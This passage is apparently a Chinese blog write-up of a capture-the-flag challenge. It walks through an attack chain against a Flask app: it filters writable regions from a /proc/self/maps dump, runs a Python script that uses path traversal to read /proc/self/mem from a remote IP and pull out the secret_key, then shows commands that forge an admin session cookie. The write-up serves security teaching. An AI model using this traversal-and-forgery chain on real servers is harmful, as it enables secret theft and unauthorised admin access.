66454905 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a8a000-7fa8a2a8c000 r--p 00009000 00:e1 66454905 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a8c000-7fa8a2a8d000 r--p 0000a000 00:e1 66454905 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a8d000-7fa8a2a8e000 rw-p 0000b000 00:e1 66454905 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a8e000-7fa8a2a99000 rw-p 00000000 00:00 0 \n7fa8a2a99000-7fa8a2a9a000 r--p 00000000 00:e1 66585587 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a9a000-7fa8a2a9b000 r-xp 00001000 00:e1 66585587 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a9b000-7fa8a2a9c000 r--p 00002000 00:e1 66585587 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a9c000-7fa8a2a9d000 r--p 00002000 00:e1 66585587 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a9d000-7fa8a2a9e000 rw-p 00003000 00:e1 66585587 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a9e000-7fa8a2bfd000 rw-p 00000000 00:00 0 \n7fa8a2bfd000-7fa8a2bfe000 r--p 00000000 00:e1 66454904 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fa8a2bfe000-7fa8a2bff000 r-xp 00001000 00:e1 66454904 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fa8a2bff000-7fa8a2c00000 r--p 00002000 00:e1 66454904 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c00000-7fa8a2c01000 r--p 00002000 00:e1 66454904 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c01000-7fa8a2c03000 rw-p 00003000 00:e1 66454904 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c03000-7fa8a2c06000 rw-p 00000000 00:00 0 \n7fa8a2c06000-7fa8a2c08000 r--p 00000000 00:e1 66454080 /lib/libuuid.so.1.3.0\n7fa8a2c08000-7fa8a2c0c000 r-xp 00002000 00:e1 66454080 /lib/libuuid.so.1.3.0\n7fa8a2c0c000-7fa8a2c0d000 r--p 00006000 00:e1 66454080 /lib/libuuid.so.1.3.0\n7fa8a2c0d000-7fa8a2c0e000 r--p 00006000 00:e1 66454080 /lib/libuuid.so.1.3.0\n7fa8a2c0e000-7fa8a2c0f000 rw-p 00007000 00:e1 66454080 /lib/libuuid.so.1.3.0\n7fa8a2c0f000-7fa8a2c10000 r--p 00000000 00:e1 66454929 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c10000-7fa8a2c11000 r-xp 00001000 00:e1 66454929 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c11000-7fa8a2c12000 r--p 00002000 00:e1 66454929 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c12000-7fa8a2c13000 r--p 00002000 00:e1 66454929 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c13000-7fa8a2c14000 rw-p 00003000 00:e1 66454929 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so\n7fa8a2c14000-7fa8a2cae000 rw-p 00000000 00:00 0 \n7fa8a2cae000-7fa8a2cb0000 r--p 00000000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb0000-7fa8a2cb3000 r-xp 00002000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb3000-7fa8a2cb4000 r--p 00005000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb4000-7fa8a2cb5000 r--p 00006000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb5000-7fa8a2cb6000 r--p 00006000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb6000-7fa8a2cb8000 rw-p 00007000 00:e1 66454907 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cb8000-7fa8a2cba000 r--p 00000000 00:e1 66454884 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cba000-7fa8a2cbc000 r-xp 00002000 00:e1 66454884 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cbc000-7fa8a2cbd000 r--p 00004000 00:e1 66454884 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cbd000-7fa8a2cbe000 r--p 00004000 00:e1 66454884 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cbe000-7fa8a2cbf000 rw-p 00005000 00:e1 66454884 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2cbf000-7fa8a2ea1000 rw-p 00000000 00:00 0 \n7fa8a2ea1000-7fa8a2f00000 r--p 00000000 00:e1 66454368 /usr/local/lib/libpython3.7m.so.1.0\n7fa8a2f00000-7fa8a309b000 r-xp 0005f000 00:e1 66454368 /usr/local/lib/libpython3.7m.so.1.0\n7fa8a309b000-7fa8a3147000 r--p 001fa000 00:e1 66454368 /usr/local/lib/libpython3.7m.so.1.0\n7fa8a3147000-7fa8a314d000 r--p 002a5000 00:e1 66454368 /usr/local/lib/libpython3.7m.so.1.0\n7fa8a314d000-7fa8a31b5000 rw-p 002ab000 00:e1 66454368 /usr/local/lib/libpython3.7m.so.1.0\n7fa8a31b5000-7fa8a31d6000 rw-p 00000000 00:00 0 \n7fa8a31d6000-7fa8a31eb000 r--p 00000000 00:e1 66328999 /lib/ld-musl-x86_64.so.1\n7fa8a31eb000-7fa8a3233000 r-xp 00015000 00:e1 66328999 /lib/ld-musl-x86_64.so.1\n7fa8a3233000-7fa8a3269000 r--p 0005d000 00:e1 66328999 /lib/ld-musl-x86_64.so.1\n7fa8a3269000-7fa8a326a000 r--p 00092000 00:e1 66328999 /lib/ld-musl-x86_64.so.1\n7fa8a326a000-7fa8a326b000 rw-p 00093000 00:e1 66328999 /lib/ld-musl-x86_64.so.1\n7fa8a326b000-7fa8a326e000 rw-p 00000000 00:00 0 \n7ffee7f65000-7ffee7f86000 rw-p 00000000 00:00 0 [stack]\n7ffee7fcc000-7ffee7fcf000 r--p 00000000 00:00 0 [vvar]\n7ffee7fcf000-7ffee7fd0000 r-xp 00000000 00:00 0 [vdso]\nffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]\n 整理后数据
56396bd24000-56396bd25000 r--p 00000000 00:e1 66454247 /usr/local/bin/python3.7
56396bd25000-56396bd26000 r-xp 00001000 00:e1 66454247 /usr/local/bin/python3.7
56396bd26000-56396bd27000 r--p 00002000 00:e1 66454247 /usr/local/bin/python3.7
56396bd27000-56396bd28000 r--p 00002000 00:e1 66454247 /usr/local/bin/python3.7
56396bd28000-56396bd29000 rw-p 00003000 00:e1 66454247 /usr/local/bin/python3.7
56396e277000-56396e278000 ---p 00000000 00:00 0 [heap]
56396e278000-56396e27c000 rw-p 00000000 00:00 0 [heap]
7fa8a1522000-7fa8a1562000 rw-p 00000000 00:00 0
7fa8a1608000-7fa8a165a000 rw-p 00000000 00:00 0
7fa8a1661000-7fa8a1665000 rw-p 00000000 00:00 0
7fa8a1665000-7fa8a1667000 ---p 00000000 00:00 0
7fa8a1667000-7fa8a1770000 rw-p 00000000 00:00 0
7fa8a1771000-7fa8a1784000 rw-p 00000000 00:00 0
7fa8a1787000-7fa8a17db000 rw-p 00000000 00:00 0
7fa8a17de000-7fa8a17ee000 rw-p 00000000 00:00 0
7fa8a17f1000-7fa8a1923000 rw-p 00000000 00:00 0
7fa8a1927000-7fa8a19a7000 rw-p 00000000 00:00 0
7fa8a19aa000-7fa8a19ee000 rw-p 00000000 00:00 0
7fa8a19ee000-7fa8a19f0000 r--p 00000000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7fa8a19f0000-7fa8a19f2000 r-xp 00002000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7fa8a19f2000-7fa8a19f3000 r--p 00004000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7fa8a19f3000-7fa8a19f4000 r--p 00004000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7fa8a19f4000-7fa8a19f5000 rw-p 00005000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7fa8a19f5000-7fa8a1a01000 rw-p 00000000 00:00 0
7fa8a1a04000-7fa8a1af8000 rw-p 00000000 00:00 0
7fa8a1af9000-7fa8a1b6b000 rw-p 00000000 00:00 0
7fa8a1b6b000-7fa8a1b71000 r--p 00000000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7fa8a1b71000-7fa8a1ba8000 r-xp 00006000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7fa8a1ba8000-7fa8a1bb4000 r--p 0003d000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7fa8a1bb4000-7fa8a1bb5000 r--p 00048000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7fa8a1bb5000-7fa8a1bbd000 rw-p 00049000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7fa8a1bbd000-7fa8a1c48000 rw-p 00000000 00:00 0
7fa8a1c48000-7fa8a1c96000 rw-p 00000000 00:00 0
7fa8a1c96000-7fa8a1c99000 r--p 00000000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7fa8a1c99000-7fa8a1c9d000 r-xp 00003000 00:e1 对上述数据进行简单的解释
56396bd24000-56396bd25000 r--p 00000000 00:e1 66454247 /usr/local/bin/python3.7
开头是内存映射的地址 :56396bd24000-56396bd25000
起始地址:56396bd24000 结束地址:56396bd25000
r--p:只读的地址 rw-p:可读可写的地址
00000000 :偏移量(指从文件头开始)
00:e1 :设备号,标识系统
66454247 :inode号,唯一标识文件
/usr/local/bin/python3.7 : 映射文件的地址
我们需要的是可读写的内存区域,交给Kimi助手给我们筛选一下
56396bd28000-56396bd29000 rw-p
56396e278000-56396e27c000 rw-p
7fa8a1522000-7fa8a1562000 rw-p
7fa8a1608000-7fa8a165a000 rw-p
7fa8a1661000-7fa8a1665000 rw-p
7fa8a1667000-7fa8a1770000 rw-p
7fa8a1771000-7fa8a1784000 rw-p
7fa8a1787000-7fa8a17db000 rw-p
7fa8a17de000-7fa8a17ee000 rw-p
7fa8a17f1000-7fa8a1923000 rw-p
7fa8a1927000-7fa8a19a7000 rw-p
7fa8a19aa000-7fa8a19ee000 rw-p
7fa8a19f5000-7fa8a1a01000 rw-p
7fa8a1a04000-7fa8a1af8000 rw-p
7fa8a1af9000-7fa8a1b6b000 rw-p
7fa8a1bbd000-7fa8a1c48000 rw-p
7fa8a1c48000-7fa8a1c96000 rw-p
7fa8a1d9c000-7fa8a1da8000 rw-p
7fa8a1da9000-7fa8a1e39000 rw-p
7fa8a1e3a000-7fa8a1f66000 rw-p
7fa8a2253000-7fa8a2254000 rw-p
7fa8a2254000-7fa8a2259000 rw-p
7fa8a226f000-7fa8a2271000 rw-p
7fa8a2271000-7fa8a22df000 rw-p再次利用AI只保留地址,将该内容复制到一个txt文件中,我创建了一个maps.txt的文件保存地址,方便地址遍历时内容的读取
56396bd28000-56396bd29000
56396e278000-56396e27c000
7fa8a1522000-7fa8a1562000
7fa8a1608000-7fa8a165a000
7fa8a1661000-7fa8a1665000
7fa8a1667000-7fa8a1770000
7fa8a1771000-7fa8a1784000
7fa8a1787000-7fa8a17db000
7fa8a17de000-7fa8a17ee000
7fa8a17f1000-7fa8a1923000
7fa8a1927000-7fa8a19a7000
7fa8a19aa000-7fa8a19ee000
7fa8a19f5000-7fa8a1a01000
7fa8a1a04000-7fa8a1af8000
7fa8a1af9000-7fa8a1b6b000
7fa8a1bbd000-7fa8a1c48000
7fa8a1c48000-7fa8a1c96000
7fa8a1d9c000-7fa8a1da8000
7fa8a1da9000-7fa8a1e39000
7fa8a1e3a000-7fa8a1f66000
7fa8a2253000-7fa8a2254000
7fa8a2254000-7fa8a2259000
7fa8a226f000-7fa8a2271000
7fa8a2271000-7fa8a22df000接下来编写读取内存获取secret_key的脚本;这个程序也是通过Kimi助手辅助写的
import os
import re
import requests
# 打开 /proc/self/maps 文件
with open("F://pythonshell//demo//maps.txt", "r") as maps_file:
# 逐行读取内存映射信息
for line in maps_file:
# 解析每一行的内容
parts = line.split()
#print(parts)
# 将parts列表中的第一个字符串数据给add_range
addr_range = parts[0]
#print(addr_range)
# 检查是否是可读写的内存区域
start_addr, end_addr = addr_range.split("-")
#print(start_addr,end_addr)
start_addr = int(start_addr, 16)
end_addr = int(end_addr, 16)
#print(start_addr,end_addr)
# 目标 URL
url = f"http://223.112.5.141:62579/info?file=../../proc/self/mem&start={start_addr}&end={end_addr}"
# 发送 GET 请求
response = requests.get(url)
secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", response.text)
#print(response.text)
# 打印响应内容
if secret_key:
print(secret_key)
break通过执行脚本成功获取到了secret_key:cfa10c437d474c898852dacca32761ac*abcdefgh
接下来就能够进行flask-session构造了;
附上大佬关于flask_session的理解:借鉴于Flask中的session伪造_flask session解密-CSDN博客
这里需要用到flask_session_cookie工具进行转换
所有脚本文件在附属资源里,需要自取
脚本使用方法:
这里脚本名字看你自己,我个人创建了flask_session_cookie.py,你可以用其他名字,内容复制下面就行了
解密:python flask_session_cookie.py decode -s "secret_key" -c "需要解密的session值"
加密:python flask_session_cookie.py encode -s "secret_key" -t "需要加密的session值"
通过访问/admin目录可以找到
session:eyJhZG1pbiI6MH0.aDNH5g.AN7tPJ_WYZhLZwHZ-9mUsrKXum8
利用flask_session_cookie脚本解密可以得到{'admin': 0}
python flask_session_cookie.py decode -s "cfa10c437d474c898852dacca32761ac*abcdefgh" -c eyJhZG1pbiI6MH0.aDNH5g.AN7tPJ_WYZhLZwHZ-9mUsrKXum8
构造admin=1的session : eyJhZG1pbiI6MX0.aDNLDA.TwxpFh4dQhFfvO0xb4os_6N0zy0
python flask_session_cookie.py encode -s "cfa10c437d474c898852dacca32761ac*abcdefgh" -t "{'admin': 1 }"
替换原来的session,成功获取到了flag
tips:如果构造成功session后还是没得到结果,建议重新抓包替换或者在网页端利用hackbar工具尝试,本人这里卡了一会儿,不知道是哪里的问题,通过这两种方式成功解决问题
10
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
